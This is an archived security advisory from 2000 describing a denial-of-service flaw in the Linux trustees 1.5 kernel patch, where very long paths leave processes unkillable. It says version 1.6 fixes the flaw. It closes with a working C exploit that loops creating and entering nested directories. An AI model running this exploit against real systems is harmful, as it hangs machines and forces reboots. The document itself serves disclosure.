OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
Subject: linux trustees 1.5 long path name vulnerability
From: Andrey E. Lerman (laeUNIYAR.AC.RU)
Date: Mon Apr 10 2000 - 05:20:59 CDT


Linux trustees is a kernel patch which provide Netware-like
permissions to linux. It is not in kernel by default.

For more information see project's website at
http://www.braysystems.com/linux/trustees.html

Problem description:
When accessing a file or directory with a very long path the
process hangs in an unkillable state. All other processes are
SEGFAULTing when trying to access unkillable process' /proc
entry. So system utilities ps, w, top, killall and the like are
stoppping working. Except that, the system continues to
function normally. The only solution is reboot.

The only version tested is trustees 1.5 for linux 2.2.14. But
it seems what other versions of linux trustees <1.6 are vulnerable.

I'm not sure if this vulnerability is only local DoS. It may
be possible to overwrite the process' structures in the
kernel, causing privileges elevation. I haven't investigated
that possibility yet, so I may be wrong. Servers with open ftp
incoming directory, nfs or samba shares are at risk too.

Status:
This problem is fixed in linux trustees 1.6, available for
linux 2.2.14 and 2.3.99. Thanks to the author of the package,
Vyacheslav Zavadsky for a quick response.

Exploit:
#include <stdio.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <fcntl.h>
#include <unistd.h>

int main(void)
{

while(1) {
        if(mkdir("aaaa",0777)<0) {
                perror("mkdir");
                exit(1);
                }
        if(chdir("aaaa")<0) {
                perror("chdir");
                exit(1);
                }
        }

return(0);
}
-- END --